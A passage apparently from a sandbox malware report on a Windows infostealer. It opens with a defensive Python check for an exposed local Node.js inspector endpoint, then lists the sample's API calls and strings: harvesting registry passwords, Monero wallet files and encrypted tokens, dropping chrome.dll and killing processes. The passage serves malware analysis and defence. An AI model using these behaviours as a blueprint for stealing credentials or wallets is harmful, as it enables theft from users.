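This routine issues a plain GET to http://localhost:9229/json (9229 is the default port of the Node.js inspector; Chromium's remote-debugging interface serves the same /json discovery document) and then scans the body for the literals `"webSocketDebuggerUrl":` and `"ws://`, so it is looking for a live debugger endpoint on the victim machine that it could attach to. The Python below is an added example, not from the report or the sample: it applies the same marker scan to a constructed /json response, compares the result with a proper JSON parse, and provides a host check that reports whether anything on the local machine answers that endpoint. The target id and the file path in the fixture are made up.

```python
from __future__ import annotations

import json
import urllib.error
import urllib.request

# Strings visible in the sample's disassembly.
INSPECTOR_URL = "http://localhost:9229/json"
WS_KEY_MARKER = '"webSocketDebuggerUrl":'
WS_SCHEME_MARKER = '"ws://'

# Constructed response in the shape Node's inspector returns from /json: a JSON
# array with one object per debuggable target. The id and path are made up.
SAMPLE_TARGET_ID = "0f3ea7a4-5d2c-4c55-9d0a-0f2fd2d3e0b1"
SAMPLE_JSON_RESPONSE = json.dumps([{
    "description": "node.js instance",
    "devtoolsFrontendUrl": "devtools://devtools/bundled/js_app.html?experiments=true&v8only=true&ws=localhost:9229/" + SAMPLE_TARGET_ID,
    "faviconUrl": "https://nodejs.org/static/images/favicons/favicon.ico",
    "id": SAMPLE_TARGET_ID,
    "title": "app.js",
    "type": "node",
    "url": "file:///srv/app/app.js",
    "webSocketDebuggerUrl": "ws://localhost:9229/" + SAMPLE_TARGET_ID,
}])


def find_ws_debugger_url(body: str) -> str | None:
    """Extract the debugger URL the way the sample does: locate the key with a
    substring search, then require a literal "ws:// after it and read up to the
    closing quote. A wss:// value or a missing key yields None, as it would for
    the marker scan in the binary."""
    key_at = body.find(WS_KEY_MARKER)
    if key_at < 0:
        return None
    scheme_at = body.find(WS_SCHEME_MARKER, key_at + len(WS_KEY_MARKER))
    if scheme_at < 0:
        return None
    start = scheme_at + 1                 # skip the opening quote, keep "ws://"
    end = body.find('"', start)
    return body[start:end] if end > start else None


def find_ws_debugger_urls_json(body: str) -> list[str]:
    """The same information via a real JSON parse; use this in your own tooling."""
    try:
        targets = json.loads(body)
    except json.JSONDecodeError:
        return []
    if not isinstance(targets, list):
        return []
    return [t["webSocketDebuggerUrl"] for t in targets
            if isinstance(t, dict) and isinstance(t.get("webSocketDebuggerUrl"), str)]


def probe_local_inspector(url: str = INSPECTOR_URL, timeout: float = 0.5) -> list[str]:
    """Host check: does anything on this machine answer the discovery endpoint?
    Returns the advertised debugger URLs, or [] when the port is closed, the
    request fails or the body is not an inspector document."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            body = resp.read().decode("utf-8", errors="replace")
    except (urllib.error.URLError, OSError, ValueError):
        return []
    return find_ws_debugger_urls_json(body)


if __name__ == "__main__":
    print("marker scan:", find_ws_debugger_url(SAMPLE_JSON_RESPONSE))
    print("json parse: ", find_ws_debugger_urls_json(SAMPLE_JSON_RESPONSE))
    print("this host:  ", probe_local_inspector() or "nothing answering on 9229")
```

An inspector endpoint reachable on loopback gives any local process full control of the debugged runtime, so the practical check is the probe: a non-empty result on a workstation means some Node or Electron application was started with inspection enabled and should be found and fixed before this kind of sample finds it.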
                            APIs
                              • Part of subcall function 00E47330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00E4739A
                              • Part of subcall function 00E47330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00E47411
                              • Part of subcall function 00E47330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00E4746D
                              • Part of subcall function 00E47330: GetProcessHeap.KERNEL32(00000000,?), ref: 00E474B2
                              • Part of subcall function 00E47330: HeapFree.KERNEL32(00000000), ref: 00E474B9
                            • lstrcat.KERNEL32(00000000,00E6192C), ref: 00E47666
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00E476A8
                            • lstrcat.KERNEL32(00000000, : ), ref: 00E476BA
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00E476EF
                            • lstrcat.KERNEL32(00000000,00E61934), ref: 00E47700
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00E47733
                            • lstrcat.KERNEL32(00000000,00E61938), ref: 00E4774D
                            • task.LIBCPMTD ref: 00E4775B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                            • String ID: :
                            • API String ID: 2677904052-3653984579
                            • Opcode ID: 84e6fb4bd9b19be484cd91872219333dd74960f2bf4f82a5169b6bfeda2a349f
                            • Instruction ID: 6f554463229e63d89f588b460677462801d6ff2d317b4146816897fd3d3ff6d7
                            • Opcode Fuzzy Hash: 84e6fb4bd9b19be484cd91872219333dd74960f2bf4f82a5169b6bfeda2a349f
                            • Instruction Fuzzy Hash: 5F3181B5940204DBDB18EBA0EE95DFEB3B9AB54301F505129F112B33D4CB34A986CB90
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,009CECB0,00000000,?,00E60E14,00000000,?,00000000), ref: 00E582C0
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00E582C7
                            • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00E582E8
                            • __aulldiv.LIBCMT ref: 00E58302
                            • __aulldiv.LIBCMT ref: 00E58310
                            • wsprintfA.USER32 ref: 00E5833C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                            • String ID: %d MB$@
                            • API String ID: 2774356765-3474575989
                            • Opcode ID: 48b469b183f8ebce5317ca3a16158d3a9cf078e210be76078b574216bc0e15ab
                            • Instruction ID: f4f7113f6a8a1cef747c4badcdc79f024386c02cdd6ac4cee09afe41fb644fd7
                            • Opcode Fuzzy Hash: 48b469b183f8ebce5317ca3a16158d3a9cf078e210be76078b574216bc0e15ab
                            • Instruction Fuzzy Hash: C02127B1E44218ABDB14DFD4CD4AFAEB7B8EB44B01F104A19F615BB280C77859048BA5
                            APIs
                              • Part of subcall function 00E5AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E5AAF6
                              • Part of subcall function 00E44800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E44889
                              • Part of subcall function 00E44800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E44899
                            • InternetOpenA.WININET(00E60DFB,00000001,00000000,00000000,00000000), ref: 00E4615F
                            • StrCmpCA.SHLWAPI(?,009CF3B0), ref: 00E46197
                            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00E461DF
                            • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00E46203
                            • InternetReadFile.WININET(?,?,00000400,?), ref: 00E4622C
                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00E4625A
                            • CloseHandle.KERNEL32(?,?,00000400), ref: 00E46299
                            • InternetCloseHandle.WININET(?), ref: 00E462A3
                            • InternetCloseHandle.WININET(00000000), ref: 00E462B0
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                            • String ID:
                            • API String ID: 2507841554-0
                            • Opcode ID: e7fb3f9f1016d322c9559b1b975003322de263deb4623b7eea3569907fd6d6ba
                            • Instruction ID: 3c1a82a00e51347cf4fc3377ef617a97f3a61de259e19829fed292423bd6b100
                            • Opcode Fuzzy Hash: e7fb3f9f1016d322c9559b1b975003322de263deb4623b7eea3569907fd6d6ba
                            • Instruction Fuzzy Hash: D451A6B1A40218ABDF24DF90DD45FEEB779AB04305F0045A8F605B72C0DBB46A89CF95
                            APIs
                            • type_info::operator==.LIBVCRUNTIME ref: 00EC024D
                            • ___TypeMatch.LIBVCRUNTIME ref: 00EC035B
                            • CatchIt.LIBVCRUNTIME ref: 00EC03AC
                            • CallUnexpected.LIBVCRUNTIME ref: 00EC04C8
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                            • String ID: csm$csm$csm
                            • API String ID: 2356445960-393685449
                            • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                            • Instruction ID: eeb08edfdda1bd2b9cae34c0fd64444e2459e2b52aa96c2d7c7c0f4e13306efa
                            • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                            • Instruction Fuzzy Hash: 90B16931800209DFCF19DFA4DA85EAFBBB5BF04318B14615EE9257B212D332DA52CB91
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00E4739A
                            • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00E47411
                            • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00E4746D
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00E474B2
                            • HeapFree.KERNEL32(00000000), ref: 00E474B9
                            • task.LIBCPMTD ref: 00E475B5
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$EnumFreeOpenProcessValuetask
                            • String ID: Password
                            • API String ID: 775622407-3434357891
                            • Opcode ID: a170dac7fb8395010860ede6d672e71b4c772cef3adfb5ce1f04eb843716deac
                            • Instruction ID: 9f9ec7dbbc84dbc50872f6223d402a0eba6160ce825d32156d605196b9092673
                            • Opcode Fuzzy Hash: a170dac7fb8395010860ede6d672e71b4c772cef3adfb5ce1f04eb843716deac
                            • Instruction Fuzzy Hash: 51612BB19041689BDB24DB50DD41BEAB3B8BF44304F0095E9E689B6241EFB06FC9CF90
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E578C4
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00E578CB
                            • RegOpenKeyExA.ADVAPI32(80000002,009BC8F8,00000000,00020119,Ix), ref: 00E578EB
                            • RegQueryValueExA.ADVAPI32(Ix,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00E5790A
                            • RegCloseKey.ADVAPI32(Ix), ref: 00E57914
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: CurrentBuildNumber$Ix
                            • API String ID: 3225020163-4041952297
                            • Opcode ID: b2258c7b695738c1692d2ddc7728fcba4565ad7f0e221932181fdbf2f65f2572
                            • Instruction ID: b5e6c7c10d89bf0fcacd47431dca23e19f58bda7059316320126867eb7883d94
                            • Opcode Fuzzy Hash: b2258c7b695738c1692d2ddc7728fcba4565ad7f0e221932181fdbf2f65f2572
                            • Instruction Fuzzy Hash: 210167B5A40309BFDB14DBD4DD4AFAEB778EB44701F004594FA15A7385D7705A40CB90
                            APIs
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                              • Part of subcall function 00E5ACC0: lstrlen.KERNEL32(?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E5ACD5
                              • Part of subcall function 00E5ACC0: lstrcpy.KERNEL32(00000000), ref: 00E5AD14
                              • Part of subcall function 00E5ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AD22
                              • Part of subcall function 00E5AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E5AC82
                              • Part of subcall function 00E5AC30: lstrcat.KERNEL32(00000000), ref: 00E5AC92
                              • Part of subcall function 00E5ABB0: lstrcpy.KERNEL32(?,00E60E1A), ref: 00E5AC15
                              • Part of subcall function 00E5AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E5AAF6
                            • lstrlen.KERNEL32(00000000), ref: 00E4BC6F
                              • Part of subcall function 00E58FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E58FE2
                            • StrStrA.SHLWAPI(00000000,AccountId), ref: 00E4BC9D
                            • lstrlen.KERNEL32(00000000), ref: 00E4BD75
                            • lstrlen.KERNEL32(00000000), ref: 00E4BD89
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                            • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                            • API String ID: 3073930149-1079375795
                            • Opcode ID: 9c4e75cb26f87f18e9388d6bd5981d6ad68164250169ef7062b237c7bf1e7140
                            • Instruction ID: 31600fd0aa1bd68fe1d24d8ea241d1e9e2e6b4af44d199f9a6b2c204610c614c
                            • Opcode Fuzzy Hash: 9c4e75cb26f87f18e9388d6bd5981d6ad68164250169ef7062b237c7bf1e7140
                            • Instruction Fuzzy Hash: D3B123719101089BCF14FBA0DD66EEEB379AF54301F485AB8F91672191EF346A4CCB62
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess$DefaultLangUser
                            • String ID: *
                            • API String ID: 1494266314-163128923
                            • Opcode ID: ef8ccc28edc8224ff7ec9ed46131d67d517254099d27420aeaa74eb85e5d19d7
                            • Instruction ID: 7d31726ad75fcb1bce7e1b02433092d4e40ed6754cd2f67048928476a1ba31b3
                            • Opcode Fuzzy Hash: ef8ccc28edc8224ff7ec9ed46131d67d517254099d27420aeaa74eb85e5d19d7
                            • Instruction Fuzzy Hash: 28F08230988219EFD3589FE0E60979CFB31EB04707F1141A5FA29A72C4D6705AC4DB52
                            APIs
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                              • Part of subcall function 00E59850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00E508DC,C:\ProgramData\chrome.dll), ref: 00E59871
                              • Part of subcall function 00E4A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00E4A098
                            • StrCmpCA.SHLWAPI(00000000,009C9938), ref: 00E50922
                            • StrCmpCA.SHLWAPI(00000000,009C99A8), ref: 00E50B79
                            • StrCmpCA.SHLWAPI(00000000,009C9928), ref: 00E50A0C
                              • Part of subcall function 00E5AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E5AAF6
                            • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00E50C35
                            Strings
                            • C:\ProgramData\chrome.dll, xrefs: 00E508CD
                            • C:\ProgramData\chrome.dll, xrefs: 00E50C30
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                            • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                            • API String ID: 585553867-663540502
                            • Opcode ID: 4cebddd2f1549aa532368a76fef8e1f66fa3e42b57b534b2f2c7ebee247cf88b
                            • Instruction ID: 3e364b4d9813b31e0886299ac2e8aeb1eee1f51a05f32481828898e9727d3db8
                            • Opcode Fuzzy Hash: 4cebddd2f1549aa532368a76fef8e1f66fa3e42b57b534b2f2c7ebee247cf88b
                            • Instruction Fuzzy Hash: F2A169717002089FCF28FF64D996EED77B6AF95300F14956DE80A5F342DA309A09CB92
                            APIs
                              • Part of subcall function 00E58CF0: GetSystemTime.KERNEL32(00E60E1B,009CB1A0,00E605B6,?,?,00E413F9,?,0000001A,00E60E1B,00000000,?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E58D16
                            • wsprintfA.USER32 ref: 00E49E7F
                            • lstrcat.KERNEL32(00000000,?), ref: 00E49F03
                            • lstrcat.KERNEL32(00000000,?), ref: 00E49F17
                            • lstrcat.KERNEL32(00000000,00E612D8), ref: 00E49F29
                            • lstrcpy.KERNEL32(?,00000000), ref: 00E49F7C
                            • Sleep.KERNEL32(00001388), ref: 00E4A013
                              • Part of subcall function 00E599A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00E599C5
                              • Part of subcall function 00E599A0: Process32First.KERNEL32(00E4A056,00000128), ref: 00E599D9
                              • Part of subcall function 00E599A0: Process32Next.KERNEL32(00E4A056,00000128), ref: 00E599F2
                              • Part of subcall function 00E599A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E59A4E
                              • Part of subcall function 00E599A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00E59A6C
                              • Part of subcall function 00E599A0: CloseHandle.KERNEL32(00000000), ref: 00E59A79
                              • Part of subcall function 00E599A0: CloseHandle.KERNEL32(00E4A056), ref: 00E59A88
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$CloseHandleProcessProcess32$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                            • String ID: D
                            • API String ID: 531068710-2746444292
                            • Opcode ID: 656681a9f780806e1c7e91a9f1d41672aff97267b5523aa739a5217e6f2b1f6f
                            • Instruction ID: 0862a0b32e6b26c4792dec324a07bac84a2c373bba33929dc8662d3883affe91
                            • Opcode Fuzzy Hash: 656681a9f780806e1c7e91a9f1d41672aff97267b5523aa739a5217e6f2b1f6f
                            • Instruction Fuzzy Hash: E85165B19443189BDB24DB60DC4AFDAB3B8AB44705F044598F60DBB2C1EB755B88CF51
                            APIs
                            • _ValidateLocalCookies.LIBCMT ref: 00EBFA1F
                            • ___except_validate_context_record.LIBVCRUNTIME ref: 00EBFA27
                            • _ValidateLocalCookies.LIBCMT ref: 00EBFAB0
                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00EBFADB
                            • _ValidateLocalCookies.LIBCMT ref: 00EBFB30
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                            • String ID: csm
                            • API String ID: 1170836740-1018135373
                            • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                            • Instruction ID: 9d90209dd77eda88f8e688772a0b3338bbdc6146a1d589e01221624a3f0aa716
                            • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                            • Instruction Fuzzy Hash: 77418030A00219EFCF14DF68CC84ADEBBF5AF49324F149169E919BB392D7319A05CB91
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00E4501A
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00E45021
                            • InternetOpenA.WININET(00E60DE3,00000000,00000000,00000000,00000000), ref: 00E4503A
                            • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00E45061
                            • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00E45091
                            • InternetCloseHandle.WININET(?), ref: 00E45109
                            • InternetCloseHandle.WININET(?), ref: 00E45116
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                            • String ID:
                            • API String ID: 3066467675-0
                            • Opcode ID: 0e5b68cd9e3cb9b3b63d20c97fd30ade15a38da1bc3d21ee4f5e258be203e028
                            • Instruction ID: 1a0985fa017f8799709500f300338523d5890b2b511d81ffc612e427b0c27f04
                            • Opcode Fuzzy Hash: 0e5b68cd9e3cb9b3b63d20c97fd30ade15a38da1bc3d21ee4f5e258be203e028
                            • Instruction Fuzzy Hash: 9631F6B5A40218ABDB24DF94DD85BDDB7B5AB48304F1081E8FA09B7281D7706EC58F98
                            APIs
                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00E585B6
                            • wsprintfA.USER32 ref: 00E585E9
                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00E5860B
                            • RegCloseKey.ADVAPI32(00000000), ref: 00E5861C
                            • RegCloseKey.ADVAPI32(00000000), ref: 00E58629
                              • Part of subcall function 00E5AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E5AAF6
                            • RegQueryValueExA.ADVAPI32(00000000,009CEA88,00000000,000F003F,?,00000400), ref: 00E5867C
                            • lstrlen.KERNEL32(?), ref: 00E58691
                            • RegQueryValueExA.ADVAPI32(00000000,009CEAA0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00E60B3C), ref: 00E58729
                            • RegCloseKey.ADVAPI32(00000000), ref: 00E58798
                            • RegCloseKey.ADVAPI32(00000000), ref: 00E587AA
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                            • String ID: %s\%s
                            • API String ID: 3896182533-4073750446
                            • Opcode ID: d2a4a25119d186292b48ebc8e580b02dd3a504d9757bb8bcc6db97f5e1326b7b
                            • Instruction ID: c9296ff42b632a44fec67f695f66d34f54d0b85ce3d630620043f092b848115c
                            • Opcode Fuzzy Hash: d2a4a25119d186292b48ebc8e580b02dd3a504d9757bb8bcc6db97f5e1326b7b
